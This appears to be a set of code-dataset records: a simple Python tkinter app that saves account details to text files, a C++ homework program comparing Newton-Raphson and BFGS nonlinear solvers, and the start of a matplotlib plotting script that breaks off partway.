[ { "alpha_fraction": 0.5635380744934082, "alphanum_fraction": 0.5971417427062988, "avg_line_length": 29.0059871673584, "blob_id": "a0c40c64bd204147770cb4a59b8575440cb3c6bd", "content_id": "a5c5a24843f5c7f8dc5eb156ffda1207f5f2ddc6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5178, "license_type": "no_license", "max_line_length": 115, "num_lines": 167, "path": "/Data master.py", "repo_name": "vorier/Data_master", "src_encoding": "UTF-8", "text": "from tkinter import *\r\nfrom tkinter import filedialog\r\nimport tkinter as tk\r\nimport os\r\nimport os.path\r\n\r\n\r\ndef write_data():\r\n username_info = username.get()\r\n password_info = password.get()\r\n email_info = email.get()\r\n website_info = website.get()\r\n\r\n\r\n save_path = \"94682167846512318\"\r\n path_name = os.path.join(save_path, website_info + \".txt\")\r\n with open(path_name, \"w\") as f:\r\n f.write(\"Website: \" + website_info + \"\\n\")\r\n f.write(\"Username: \" + username_info + \"\\n\")\r\n f.write(\"Password: \" + password_info + \"\\n\")\r\n f.write(\"Email: \" + email_info + \"\\n\")\r\n\r\n username_input.delete(0, END)\r\n password_input.delete(0, END)\r\n email_input.delete(0, END)\r\n website_input.delete(0, END)\r\n\r\n Label(nscreen, text=\"File created\", fg=\"green\", font=(\"calibri, 12\")).pack()\r\n\r\n\r\ndef newf():\r\n\r\n global nscreen\r\n nscreen = Toplevel(screen)\r\n nscreen.title(\"New\")\r\n nscreen.geometry(\"300x300\")\r\n\r\n global username\r\n global password\r\n global email\r\n global website\r\n global username_input\r\n global password_input\r\n global email_input\r\n global website_input\r\n username = StringVar()\r\n password = StringVar()\r\n email = StringVar()\r\n website = StringVar()\r\n\r\n Label(nscreen, text=\"Enter your details below\").pack()\r\n Label(nscreen, text=\"\").pack()\r\n Label(nscreen, text=\"Username:\").pack()\r\n username_input = Entry(nscreen, textvariable=username)\r\n username_input.pack()\r\n Label(nscreen, text=\"Password:\").pack()\r\n password_input = Entry(nscreen, textvariable=password)\r\n password_input.pack()\r\n Label(nscreen, text=\"Email:\").pack()\r\n email_input = Entry(nscreen, textvariable=email)\r\n email_input.pack()\r\n Label(nscreen, text=\"Website:\").pack()\r\n website_input = Entry(nscreen, textvariable=website)\r\n website_input.pack()\r\n create_file = tk.Button(nscreen, text=\"Create File\", width=10, height=1, command=write_data)\r\n create_file.pack()\r\n\r\n\r\ndef openf():\r\n\r\n oscreen = Toplevel(screen)\r\n oscreen.title(\"File Editor\")\r\n oscreen.iconbitmap(\"C:\")\r\n oscreen.geometry(\"500x450\")\r\n\r\n def viewf():\r\n\r\n text_file = filedialog.askopenfilename(initialdir=\"94682167846512318\",\r\n title=\"Open Text File\", filetypes=((\"Test File\", \"*.txt\"),))\r\n text_file = open(text_file, \"r\")\r\n tf = text_file.read()\r\n\r\n my_text.insert(END, tf)\r\n text_file.close()\r\n\r\n def savef():\r\n text_file = filedialog.askopenfilename(initialdir=\"94682167846512318\",\r\n title=\"Open Text File\", filetypes=((\"Test File\", \"*.txt\"),))\r\n text_file = open(text_file, \"w\")\r\n tf = text_file.write(my_text.get(1.0, END))\r\n\r\n my_text.insert(END, tf)\r\n text_file.close()\r\n\r\n my_text = Text(oscreen, bg=\"white\", width=40, height=15, font=(\"Helvetica\", 16))\r\n my_text.pack(pady=20)\r\n\r\n open_button = tk.Button(oscreen, text=\"Open File\", width=20, height=5, bg=\"#34495E\", fg=\"white\", command=viewf)\r\n open_button.pack(side=LEFT)\r\n\r\n save_button = tk.Button(oscreen, text=\"Save File\", width=20, height=5, bg=\"#34495E\", fg=\"white\", command=savef)\r\n save_button.pack(side=LEFT)\r\n\r\n oscreen.mainloop()\r\n\r\n\r\ndef file_deleting():\r\n\r\n delete_text = dfile.get()\r\n\r\n directory = \"94682167846512318\"\r\n path_name = os.path.join(directory, delete_text + \".txt\")\r\n os.remove(path_name)\r\n\r\n dfile_input.delete(0, END)\r\n\r\n Label(dscreen, text=\"File Deleted\", fg=\"green\", font=(\"calibri, 12\")).pack()\r\n\r\n\r\ndef delf():\r\n\r\n global dscreen\r\n dscreen = Toplevel()\r\n dscreen.title(\"File Deleter\")\r\n dscreen.geometry(\"300x150\")\r\n\r\n global dfile\r\n global dfile_input\r\n dfile = StringVar()\r\n\r\n Label(dscreen, text=\"Enter below the name of the file you want to delete.\").pack()\r\n Label(dscreen, text=\"\").pack()\r\n Label(dscreen, text=\"File Name:\").pack()\r\n dfile_input = Entry(dscreen, textvariable=dfile)\r\n dfile_input.pack()\r\n del_file = tk.Button(dscreen, text=\"Delete File\", width=10, height=1, command=file_deleting)\r\n del_file.pack()\r\n\r\n\r\ndef main_screen():\r\n\r\n global screen\r\n screen = tk.Tk()\r\n screen.geometry(\"500x350\")\r\n screen.title(\"Data master\")\r\n screen.iconbitmap(r\"data.ico\")\r\n label = tk.Label(text=\"Welcome to Data master, please choose what you wish to do.\",\r\n bg=\"#34495E\", fg=\"white\", width=\"700\", height=\"3\", font=(\"Calibri\", 13))\r\n label.pack()\r\n\r\n Label(text=\"\").pack()\r\n newFile = tk.Button(text=\"New File\", width=15, height=2, bg=\"#34495E\", fg=\"white\", font=(\"Calibri\", 13),\r\n command=newf)\r\n newFile.pack()\r\n Label(text=\"\").pack()\r\n viewFile = tk.Button(text=\"View File\", width=15, height=2, bg=\"#34495E\", fg=\"white\", font=(\"Calibri\", 13),\r\n command=openf)\r\n viewFile.pack()\r\n Label(text=\"\").pack()\r\n deleteFile = tk.Button(text=\"Delete File\", width=15, height=2, bg=\"#34495E\", fg=\"white\", font=(\"Calibri\", 13),\r\n command=delf)\r\n deleteFile.pack()\r\n\r\n screen.mainloop()\r\n\r\n\r\nmain_screen()\r\n" } ]
1
MDBrothers/nonlinear_solvers
https://github.com/MDBrothers/nonlinear_solvers
0810cd82926d0318c3cf1094fba73d9e115b59ee
4dda1fa7446405eb6b7d7f1914a4d34c38a3ab5a
77df1921445952d3c23d6e55261c78e777702167
refs/heads/master
2021-01-10T17:00:54.856429
2016-04-05T01:33:50
2016-04-05T01:33:50
53,368,969
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5609637498855591, "alphanum_fraction": 0.5734963417053223, "avg_line_length": 36.1491813659668, "blob_id": "bfd649e46cd3b179c04d75389d49ad204ef5914a", "content_id": "07f8eb7beaeea889245bda33e76d3f44308d59e8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 22661, "license_type": "no_license", "max_line_length": 128, "num_lines": 610, "path": "/mbrothers_nlfea_hw_5.cpp", "repo_name": "MDBrothers/nonlinear_solvers", "src_encoding": "UTF-8", "text": "#include <iostream>\n#include <vector>\n#include <exception>\n#include \"/home/mbrothers/Projects/armadillo/include/armadillo\"\n//#include <armadillo>\n#include <sstream>\n#include <fstream>\n#include <string>\n#include <iostream>\n\n#define MAX_ITRS 14\n\n/* File output */\ntemplate <typename scalarT>\nvoid writeCSVContents(const std::string filename, std::vector<scalarT>& container, unsigned NCOLS)\n{\n try{\n\n std::ofstream outfile;\n outfile.open( filename, std::ios::app );\n\n const unsigned ContainerLength= container.size();\n if(not ((ContainerLength % NCOLS)==0)) throw 121;\n\n if(outfile){\n for(unsigned containerIndex(0); containerIndex<ContainerLength; ){\n for(unsigned lineIndex(0); lineIndex < (NCOLS-1); ++lineIndex){\n outfile << container[containerIndex++] << \", \";\n }\n outfile << container[containerIndex++] << \"\\n\";\n }\n }\n outfile.close();\n }\n catch(int e){\n std::cout << \"An exception occured. Nr. \" << e << '\\n';\n }\n}\n//template void writeCSVContents<double>( const std::string filename, std::vector<double>& container, unsigned NCOLS);\n//template void writeCSVContents<std::string>( const std::string filename, std::vector<std::string>& container, unsigned NCOLS);\n\n\n/* Per the problem statement, compute the elements of N */\nvoid eval_N(arma::vec::fixed<2> &myN,\n const arma::vec::fixed<2> &myd,\n const double myx)\n{\n myN[0] = myx*myd[0]*myd[0]*myd[0] - 2.0*myd[1]*myd[1] + 5.6*myd[0];\n myN[1] = myd[1] - myd[0];\n}\n\n/* Compute the elements of the tangent stiffness matrix using centered finite difference. */\nvoid compute_jacobian(arma::mat::fixed<2,2> &myTS,\n arma::vec::fixed<2> &myd, const double myx,\n const double myeps)\n{\n arma::vec::fixed<2> neg_pert_N, pos_pert_N;\n arma::vec::fixed<2> unperturbed_d;\n\n unperturbed_d = myd;\n\n myd[0] += myeps;\n eval_N(pos_pert_N, myd, myx);\n myd[0] = unperturbed_d[0];\n\n myd[0] -= myeps;\n eval_N(neg_pert_N, myd, myx);\n myd[0] = unperturbed_d[0];\n\n /* dN1/dd1 and dN2/dd1 */\n myTS.col(0) = (pos_pert_N - neg_pert_N)/(2.0*myeps);\n\n myd[1] += myeps;\n eval_N(pos_pert_N, myd, myx);\n myd[1] = unperturbed_d[1];\n\n myd[1] -= myeps;\n eval_N(neg_pert_N, myd, myx);\n myd[1] = unperturbed_d[1];\n\n /* dN1/dd2 and dN2/dd2 */\n myTS.col(1) = (pos_pert_N - neg_pert_N)/(2.0*myeps);\n}\n\n/* eval the res according to the criterion as in the problem statement. */\nbool converged(const arma::vec::fixed<2> &myres,\n const double myeps,\n const double frst_res_nrm,\n double &myres_nrm)\n{\n myres_nrm = arma::norm(myres, 2);\n return myres_nrm <= (myeps*frst_res_nrm);\n}\n\nvoid save_soln(std::vector< arma::vec::fixed<2> > &myd_vectors,\n const arma::vec::fixed<2> &myd)\n{\n myd_vectors.push_back(myd);\n}\n\nvoid comp_and_store_v_BFGS(std::vector<arma::vec::fixed<2> > &myv_BFGS,\n const arma::vec::fixed<2> &mydelta_d,\n const arma::vec::fixed<2> &mydelta_R)\n{\n myv_BFGS.push_back(mydelta_d/(arma::dot(mydelta_d, mydelta_R)));\n}\n\nvoid comp_and_store_w_BFGS(std::vector<arma::vec::fixed<2> > &myw_BFGS,\n const arma::vec::fixed<2> &mydelta_R,\n const arma::vec::fixed<2> &myR,\n const double myalpha)\n{\n myw_BFGS.push_back(myalpha*myR - mydelta_R);\n}\n\nvoid comp_and_store_alpha_BFGS(std::vector<double> &myalpha_BFGS,\n const arma::vec::fixed<2> &mydelta_d,\n const arma::vec::fixed<2> &mydelta_R,\n const arma::vec::fixed<2> &myR,\n const double mys)\n{\n myalpha_BFGS.push_back(std::sqrt(-mys*arma::dot(mydelta_R, mydelta_d)/\n arma::dot(myR, mydelta_d)));\n}\n\nint main(){\n /* Basic data structures used for each problem part */\n arma::mat::fixed<2,2> jacobian;\n arma::vec::fixed<2> int_frc, d, delta_d, ext_frc;\n\n /* For each part of the problem, 'numerical' d values.*/\n std::vector< arma::vec::fixed<2> > d_pure_NR;\n std::vector< arma::vec::fixed<2> > d_moded_NR;\n std::vector< arma::vec::fixed<2> > d_moded_NR_wls;\n std::vector< arma::vec::fixed<2> > d_moded_NR_BFGS;\n std::vector< arma::vec::fixed<2> > d_moded_NR_BFGS_wls;\n\n /* Num iterations per load step */\n std::vector<int> itrs_pure_NR;\n std::vector<int> itrs_moded_NR;\n std::vector<int> itrs_moded_NR_wls;\n std::vector<int> itrs_moded_NR_BFGS;\n std::vector<int> itrs_moded_NR_BFGS_wls;\n\n /* The BFGS vectors for part four */\n std::vector< arma::vec::fixed<2> > BFGS_v;\n std::vector< arma::vec::fixed<2> > BFGS_w;\n std::vector< double > BFGS_alpha;\n\n /* Initialize the reusable data structures to zero and give values to the control constants*/\n jacobian.zeros(); int_frc.zeros(); d.zeros(); delta_d.zeros();\n ext_frc.zeros();\n const int num_load_steps(40);\n const double load_increment(0.25), x(0.19), eps_conv(1.E-4), eps_probe(1.E-8);\n\n pure:\n /********************************/\n /*Solve with pure Newton Raphson*/\n /********************************/\n std::cout << \"\\nNew Method: pure Newton Raphson\" << std::endl;\n\n /* Apply each of the load steps and attempt to find d to the specified tolerance. */\n for(int step(0); step < num_load_steps; step++){\n\n /* Update the load vector */\n ext_frc[0] = (1+step)*load_increment;\n\n /* Compute the frst res of the load step*/\n eval_N(int_frc, d, x);\n double frst_res_nrm = arma::norm(ext_frc - int_frc, 2);\n double res_nrm(0.0);\n std::cout << \"\\nStep: \" << step + 1 << \" Conv criterion: \"\n << frst_res_nrm*eps_conv << std::endl;\n\n /* Attempt to iteratively solve for d, if we fail, . */\n for(int itr(0); itr < MAX_ITRS; itr++){\n\n /* Compute the consistent tangent stiffness matrix */\n compute_jacobian(jacobian, d, x, eps_probe);\n\n /* Solve for the update vector, then update d */\n d += arma::solve(jacobian, ext_frc - int_frc);\n\n /* Have we reached an acceptable soln? */\n eval_N(int_frc, d, x);\n if(converged(ext_frc - int_frc, eps_conv, frst_res_nrm, res_nrm)){\n save_soln(d_pure_NR, d);\n itrs_pure_NR.push_back(itr + 1);\n std::cout <<\"\\tconverged: \" << itr << \" res: \" << res_nrm << std::endl;\n break; //Exit inner loop and re-enter the load step loop because we have succeeded.\n }\n std::cout <<\"\\titr: \" << itr << \" res: \" << res_nrm << std::endl;\n /* The residual is undefined, apply more load steps */\n if(res_nrm!=res_nrm)\n std::cout << \"**** NAN in resdiual eval, continuing anyway.\" << std::endl;\n\n /* The method as applied has broken down, warn the user but continue applying load steps */\n if(itr == MAX_ITRS - 1){\n \tstd::cout << \"**** max num ITRS exceeded, applying another loadstep.\" << std::endl;\n\t\t\t\tsave_soln(d_pure_NR, d);\n\t\t\t\titrs_pure_NR.push_back(itr + 1);\n\t\t\t}\n\t\t}\n }\n\n moded:\n\n /************************************/\n /*Solve with moded Newton Raphson */\n /************************************/\n std::cout << \"\\nNew Method: moded Newton Raphson\" << std::endl;\n jacobian.zeros(), int_frc.zeros(), d.zeros(), delta_d.zeros(), ext_frc.zeros();\n\n /* Apply each of the load steps and attempt to find d to the specified tolerance. */\n for(int step(0); step < num_load_steps; step++){\n\n /* Update the load vector */\n ext_frc[0] = (1+step)*load_increment;\n\n /* Compute the frst res of the load step */\n eval_N(int_frc, d, x);\n double frst_res_nrm = arma::norm(ext_frc - int_frc, 2);\n double res_nrm(0.0);\n std::cout << \"\\nStep: \" << step + 1 << \" Conv criterion: \"\n << frst_res_nrm*eps_conv << std::endl;\n\n /* Attempt to iteratively solve for d, if we fail, . */\n for(int itr(0); itr < MAX_ITRS; itr++){\n\n /* Compute the consistent tangent stiffness matrix but only on the frst itr*/\n if(itr == 0) compute_jacobian(jacobian, d, x, eps_probe);\n\n /* Solve for the update vector, then update d */\n d += arma::solve(jacobian, ext_frc - int_frc);\n\n /* Have we reached an acceptable soln? */\n eval_N(int_frc, d, x);\n if(converged(ext_frc - int_frc, eps_conv, frst_res_nrm, res_nrm)){\n save_soln(d_moded_NR, d);\n itrs_moded_NR.push_back(itr + 1);\n std::cout <<\"\\tconverged: \" << itr << \" res: \" << res_nrm << std::endl;\n break; //Exit inner loop and re-enter the load step loop because we have succeeded.\n }\n std::cout <<\"\\titr: \" << itr << \" res: \" << res_nrm << std::endl;\n if(res_nrm!=res_nrm)\n std::cout << \"**** NAN in resdiual eval, continuing\" << std::endl;\n\n /* The method as applied has broken down, warn the user */\n if(itr == MAX_ITRS - 1){\n \tstd::cout << \"**** max num ITRS exceeded, apply more load steps\" << std::endl;\n save_soln(d_moded_NR, d);\n itrs_moded_NR.push_back(itr + 1);\n }\n }\n }\n\n moded_wls:\n\n /*****************************************************/\n /*Solve with moded Newton Raphson with line search*/\n /*****************************************************/\n std::cout << \"\\nNew Method: moded Newton Raphson with line search\" << std::endl;\n jacobian.zeros(), int_frc.zeros(), d.zeros(), delta_d.zeros(), ext_frc.zeros();\n\n /* Apply each of the load steps and attempt to find d to the specified tolerance. */\n for(int step(0); step < num_load_steps; step++){\n\n /* Update the load vector */\n ext_frc[0] = (1+step)*load_increment;\n\n /* Compute the frst res of the load step */\n eval_N(int_frc, d, x);\n double frst_res_nrm = arma::norm(ext_frc - int_frc, 2);\n double res_nrm(0.0);\n std::cout << \"\\nStep: \" << step + 1 << \" Conv criterion: \"\n << frst_res_nrm*eps_conv << std::endl;\n\n /* Attempt to iteratively solve for d, if we fail, . */\n for(int itr(0); itr < MAX_ITRS; itr++){\n\n /* Compute the consistent tangent stiffness matrix but only on the frst itertation */\n if(itr == 0) compute_jacobian(jacobian, d, x, eps_probe);\n\n /* Solve for the update vector, then initialize the line search */\n delta_d = arma::solve(jacobian, ext_frc - int_frc);\n double srch_prm(1.0), G_zero(0);\n bool ln_srch_win(false);\n G_zero = arma::dot(delta_d, ext_frc - int_frc);\n\n /* Perform the line search, exit if failed */\n for(int search_it(0); search_it < 5; search_it++){\n eval_N(int_frc, d + srch_prm*delta_d, x);\n if(std::abs(arma::dot(delta_d, ext_frc - int_frc)) <\n std::abs(.5*G_zero)){\n d += delta_d*srch_prm; ln_srch_win = true; break;\n }\n else srch_prm*=1.0/std::sqrt(2.0); //Always try a smaller step.\n }\n if(ln_srch_win == false)\n std::cout << \"**** line search failed, going with the last guess\" << std::endl;\n\n /* Have we reached an acceptable soln? */\n eval_N(int_frc, d, x);\n if(converged(ext_frc - int_frc, eps_conv, frst_res_nrm, res_nrm)){\n save_soln(d_moded_NR_wls, d);\n itrs_moded_NR_wls.push_back(itr + 1);\n std::cout <<\"\\tconverged: \" << itr << \" res: \" << res_nrm << std::endl;\n break; //Exit inner loop and re-enter the load step loop because we have succeeded.\n }\n std::cout <<\"\\titr: \" << itr << \" res: \" << res_nrm << std::endl;\n if(res_nrm!=res_nrm)\n std::cout << \"**** NAN in resdiual eval, continuing\" << std::endl;\n\n /* The method as applied has broken down, warn the user */\n if(itr == MAX_ITRS - 1){\n std::cout << \"**** max num ITRS exceeded, apply more load steps\" << std::endl;\n save_soln(d_moded_NR_wls, d);\n itrs_moded_NR_wls.push_back(itr + 1);\n }\n }\n }\n\n moded_bfgs:\n\n /**********************************************/\n /*Solve with moded Newton Raphson with BFGS*/\n /**********************************************/\n jacobian.zeros(), int_frc.zeros(), d.zeros(), delta_d.zeros(), ext_frc.zeros();\n std::cout << \"\\nNew Method: moded Newton Raphson with BFGS\" << std::endl;\n\n /* Some variables needed for BFGS */\n arma::vec::fixed<2> delta_R;\n arma::vec::fixed<2> previous_R;\n arma::vec::fixed<2> current_R;\n arma::mat::fixed<2,2> lh_BFGS_matrix, rh_BFGS_matrix;\n\n /* Apply each of the load steps and attempt to find d to the specified tolerance. */\n for(int step(0); step < num_load_steps; step++){\n\n /* Clear previous accumulated BFGS update matricesy */\n delta_R.zeros();\n previous_R.zeros();\n current_R.zeros();\n rh_BFGS_matrix = arma::eye< arma::mat >(2,2);\n lh_BFGS_matrix = arma::eye< arma::mat >(2,2);\n BFGS_v.clear();\n BFGS_w.clear();\n BFGS_alpha.clear();\n\n /* Update the load vector */\n ext_frc[0] = (1+step)*load_increment;\n\n /* Compute the frst res of the load step */\n eval_N(int_frc, d, x);\n double frst_res_nrm = arma::norm(ext_frc - int_frc, 2);\n double res_nrm(0.0);\n std::cout << \"\\nStep: \" << step + 1 << \" Conv criterion: \" << frst_res_nrm*eps_conv << std::endl;\n\n /* Attempt to iteratively solve for d, if we fail, . */\n for(int itr(0); itr < MAX_ITRS; itr++){\n\n /* Compute the res for no update in d */\n eval_N(int_frc, d, x);\n previous_R = ext_frc - int_frc;\n\n /* Compute the consistent tangent stiffness matrix but only on the frst itr*/\n if(itr == 0){\n compute_jacobian(jacobian, d, x, eps_probe);\n\n /* Invert the jacobian and solve for delta_d */\n jacobian = arma::inv(jacobian);\n delta_d = jacobian*(ext_frc - int_frc);\n d += delta_d;\n }\n else{\n\n /* solve for delta_d, then update d */\n delta_d = lh_BFGS_matrix*jacobian*rh_BFGS_matrix*current_R;\n d += delta_d;\n }\n\n /* Store the update information */\n eval_N(int_frc, d, x);\n current_R = ext_frc - int_frc;\n delta_R = current_R - previous_R;\n\n /* compute the BFGS update vectors */\n comp_and_store_alpha_BFGS(BFGS_alpha, delta_d, delta_R, previous_R, 1.0);\n comp_and_store_v_BFGS(BFGS_v, delta_d, delta_R);\n comp_and_store_w_BFGS(BFGS_w, delta_R, previous_R, BFGS_alpha.back());\n\n /* Update the BFGS update matrices */\n lh_BFGS_matrix = (arma::eye< arma::mat >(2,2) +\n BFGS_v.back()*(BFGS_w.back().t()) )*lh_BFGS_matrix;\n rh_BFGS_matrix = rh_BFGS_matrix*(arma::eye< arma::mat >(2,2) +\n BFGS_w.back()*(BFGS_v.back().t()) );\n\n /* Test for Conv */\n if(converged(ext_frc - int_frc, eps_conv, frst_res_nrm, res_nrm)){\n save_soln(d_moded_NR_BFGS, d);\n itrs_moded_NR_BFGS.push_back(itr + 1);\n std::cout <<\"\\tconverged: \" << itr << \" res: \" << res_nrm << std::endl;\n break; //Exit inner loop and re-enter the load step loop because we have succeeded.\n }\n std::cout <<\"\\titr: \" << itr << \" res: \" << res_nrm << std::endl;\n if(res_nrm!=res_nrm)\n std::cout << \"**** NAN in resdiual eval, continuing\" << std::endl;\n\n /* The method as applied has broken down, warn the user */\n if(itr == MAX_ITRS - 1){\n std::cout << \"**** max num ITRS exceeded, apply more loadsteps\" << std::endl;\n save_soln(d_moded_NR_BFGS, d);\n itrs_moded_NR_BFGS.push_back(itr + 1);\n }\n }\n }\n\n moded_bfgs_wls:\n\n /**************************************************************/\n /*Solve with moded Newton Raphson with BFGS and line search*/\n /**************************************************************/\n jacobian.zeros(), int_frc.zeros(), d.zeros(), delta_d.zeros(), ext_frc.zeros();\n std::cout << \"\\nNew Method: moded Newton Raphson with BFGS and line search\" << std::endl;\n\n /* Apply each of the load steps and attempt to find d to the specified tolerance. */\n for(int step(0); step < num_load_steps; step++){\n\n /* Clear previous accumulated BFGS update matricesy */\n delta_R.zeros();\n previous_R.zeros();\n current_R.zeros();\n rh_BFGS_matrix = arma::eye< arma::mat >(2,2);\n lh_BFGS_matrix = arma::eye< arma::mat >(2,2);\n BFGS_v.clear();\n BFGS_w.clear();\n BFGS_alpha.clear();\n\n /* Update the load vector */\n ext_frc[0] = (1+step)*load_increment;\n\n /* Compute the frst res of the load step */\n eval_N(int_frc, d, x);\n double frst_res_nrm = arma::norm(ext_frc - int_frc, 2);\n double res_nrm(0.0);\n std::cout << \"\\nStep: \" << step + 1 << \" Conv criterion: \"\n << frst_res_nrm*eps_conv << std::endl;\n\n /* Attempt to iteratively solve for d,*/\n for(int itr(0); itr < MAX_ITRS; itr++){\n\n /* Compute the res for no update in d */\n eval_N(int_frc, d, x);\n previous_R = ext_frc - int_frc;\n\n /* Compute the consistent tangent stiffness matrix but only on the frst itr*/\n if(itr == 0){\n compute_jacobian(jacobian, d, x, eps_probe);\n\n /* Invert the jacobian and solve for delta_d */\n jacobian = arma::inv(jacobian);\n delta_d = jacobian*(ext_frc - int_frc);\n }\n else{\n /* solve for delta_d, then update d */\n delta_d = lh_BFGS_matrix*jacobian*rh_BFGS_matrix*current_R;\n }\n\n /* Initialize the line search */\n double srch_prm(1.0), G_zero(0);\n bool ln_srch_win(false);\n G_zero = arma::dot(delta_d, previous_R);\n\n /* Perform the line search, exit if failed */\n for(int search_it(0); search_it < 5; search_it++){\n eval_N(int_frc, d + srch_prm*delta_d, x);\n if(std::abs(arma::dot(delta_d, ext_frc - int_frc)) <\n std::abs(.5*G_zero)){\n d += delta_d*srch_prm; ln_srch_win = true; break;\n }\n else srch_prm*=1.0/std::sqrt(2.0); //Always try a smaller step.\n }\n if(ln_srch_win == false)\n std::cout << \"**** line search failed, going on with last guess\" << std::endl;\n\n /* Store the update information */\n current_R = ext_frc - int_frc;\n delta_R = current_R - previous_R;\n\n /* compute the BFGS update vectors */\n comp_and_store_alpha_BFGS(BFGS_alpha, delta_d, delta_R, previous_R, srch_prm);\n comp_and_store_v_BFGS(BFGS_v, delta_d, delta_R);\n comp_and_store_w_BFGS(BFGS_w, delta_R, previous_R, BFGS_alpha.back());\n\n /* Update the BFGS update matrices */\n lh_BFGS_matrix = (arma::eye< arma::mat >(2,2) +\n BFGS_v.back()*(BFGS_w.back().t()) )*lh_BFGS_matrix;\n rh_BFGS_matrix = rh_BFGS_matrix*(arma::eye< arma::mat >(2,2) +\n BFGS_w.back()*(BFGS_v.back().t()) );\n\n /* Test for Conv */\n if(converged(ext_frc - int_frc, eps_conv, frst_res_nrm, res_nrm)){\n save_soln(d_moded_NR_BFGS_wls, d);\n itrs_moded_NR_BFGS_wls.push_back(itr + 1);\n std::cout <<\"\\tconverged: \" << itr << \" res: \" << res_nrm << std::endl;\n break; //Exit inner loop and re-enter the load step loop because we have succeeded.\n }\n std::cout <<\"\\titr: \" << itr << \" res: \" << res_nrm << std::endl;\n if(res_nrm!=res_nrm)\n std::cout << \"**** NAN in resdiual eval, continuing\" << std::endl;\n\n /* The method as applied has broken down, warn the user */\n if(itr == MAX_ITRS - 1){\n std::cout << \"**** max num ITRS exceeded, apply more load steps\" << std::endl;\n save_soln(d_moded_NR_BFGS_wls, d);\n itrs_moded_NR_BFGS_wls.push_back(itr + 1);\n }\n }\n }\n\n end:\n\n /*output the numbers generated */\n std::vector<std::string> labels;\n labels.push_back(\"d_NR\");\n labels.push_back(\"N_NR\");\n writeCSVContents<std::string>(\"pure_nr_x19.txt\", labels, 2);\n for(const auto & soln : d_pure_NR){\n std::vector<double> record;\n record.push_back( soln[0]);\n d[0] = soln[0]; d[1] = soln[0];\n eval_N(int_frc, d, x);\n record.push_back(int_frc[0]);\n writeCSVContents<double>(\"pure_nr_x19.txt\",record,2);\n }\n labels.clear();\n labels.push_back(\"num iters pure nr\");\n writeCSVContents<std::string>(\"pure_nr_x19_conv.txt\", labels, 1);\n writeCSVContents<int>(\"pure_nr_x19_conv.txt\", itrs_pure_NR, 1);\n\n labels.clear();\n labels.push_back(\"d_moded_NR\");\n labels.push_back(\"N_moded_NR\");\n writeCSVContents<std::string>(\"moded_nr_x19.txt\", labels, 2);\n for(const auto & soln : d_moded_NR){\n std::vector<double> record;\n record.push_back( soln[0]);\n d[0] = soln[0]; d[1] = soln[0];\n eval_N(int_frc, d, x);\n record.push_back(int_frc[0]);\n writeCSVContents<double>(\"moded_nr_x19.txt\",record,2);\n }\n labels.clear();\n labels.push_back(\"num iters moded nr\");\n writeCSVContents<std::string>(\"moded_nr_x19_conv.txt\", labels, 1);\n writeCSVContents<int>(\"moded_nr_x19_conv.txt\", itrs_moded_NR, 1);\n\n labels.clear();\n labels.push_back(\"d_moded_NR_wls\");\n labels.push_back(\"N_moded_NR_wls\");\n writeCSVContents<std::string>(\"moded_nr_wls_x19.txt\", labels, 2);\n for(const auto & soln : d_moded_NR_wls){\n std::vector<double> record;\n record.push_back( soln[0]);\n d[0] = soln[0]; d[1] = soln[0];\n eval_N(int_frc, d, x);\n record.push_back(int_frc[0]);\n writeCSVContents<double>(\"moded_nr_wls_x19.txt\",record,2);\n }\n labels.clear();\n labels.push_back(\"num iters moded nr wls\");\n writeCSVContents<std::string>(\"moded_nr_wls_x19_conv.txt\", labels, 1);\n writeCSVContents<int>(\"moded_nr_wls_x19_conv.txt\", itrs_moded_NR_wls, 1);\n\n labels.clear();\n labels.push_back(\"d_moded_NR_BFGS\");\n labels.push_back(\"N_moded_NR_BFGS\");\n writeCSVContents<std::string>(\"moded_nr_bfgs_x19.txt\", labels, 2);\n for(const auto & soln : d_moded_NR_BFGS){\n std::vector<double> record;\n record.push_back( soln[0]);\n d[0] = soln[0]; d[1] = soln[0];\n eval_N(int_frc, d, x);\n record.push_back(int_frc[0]);\n writeCSVContents<double>(\"moded_nr_bfgs_x19.txt\",record,2);\n }\n labels.clear();\n labels.push_back(\"num iters moded nr bfgs\");\n writeCSVContents<std::string>(\"moded_nr_bfgs_x19_conv.txt\", labels, 1);\n writeCSVContents<int>(\"moded_nr_bfgs_x19_conv.txt\", itrs_moded_NR_BFGS, 1);\n\n labels.clear();\n labels.push_back(\"d_moded_NR_BFGS_wls\");\n labels.push_back(\"N_moded_NR_BFGS_wls\");\n writeCSVContents<std::string>(\"moded_nr_bfgs_wls_x19.txt\", labels, 2);\n for(const auto & soln : d_moded_NR_BFGS_wls){\n std::vector<double> record;\n record.push_back( soln[0]);\n d[0] = soln[0]; d[1] = soln[0];\n eval_N(int_frc, d, x);\n record.push_back(int_frc[0]);\n writeCSVContents<double>(\"moded_nr_bfgs_wls_x19.txt\",record,2);\n }\n labels.clear();\n labels.push_back(\"num iters moded nr bfgs wls\");\n writeCSVContents<std::string>(\"moded_nr_bfgs_wls_x19_conv.txt\", labels, 1);\n writeCSVContents<int>(\"moded_nr_bfgs_wls_x19_conv.txt\", itrs_moded_NR_BFGS_wls, 1);\n\n return 0;\n}\n" }, { "alpha_fraction": 0.6072607040405273, "alphanum_fraction": 0.6695086359977722, "avg_line_length": 37.13985824584961, "blob_id": "1de119d80390ce24df0083164ffa00747d773f18", "content_id": "75adf512232b2f3f523c8a61ab61ae296bdda78e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10908, "license_type": "no_license", "max_line_length": 253, "num_lines": 286, "path": "/generate_plots.py", "repo_name": "MDBrothers/nonlinear_solvers", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\nimport numpy as np\nimport matplotlib as mpl\nfrom tabulate import tabulate\n\n\nmpl.use('pgf')\n\ndef figsize(scale):\n fig_width_pt = 550.0 # Get this from LaTeX using \\the\\textwidth\n inches_per_pt = 1.0/72.27 # Convert pt to inch\n golden_mean = (np.sqrt(5.0)-1.0)/2.0 # Aesthetic ratio (you could change this)\n fig_width = fig_width_pt*inches_per_pt*scale # width in inches\n fig_height = fig_width*golden_mean # height in inches\n fig_size = [fig_width,fig_height]\n return fig_size\n\npgf_with_latex = { # setup matplotlib to use latex for output\n \"pgf.texsystem\": \"pdflatex\", # change this if using xetex or lautex\n \"text.usetex\": True, # use LaTeX to write all text\n \"font.family\": \"serif\",\n \"font.serif\": [], # blank entries should cause scatters to inherit 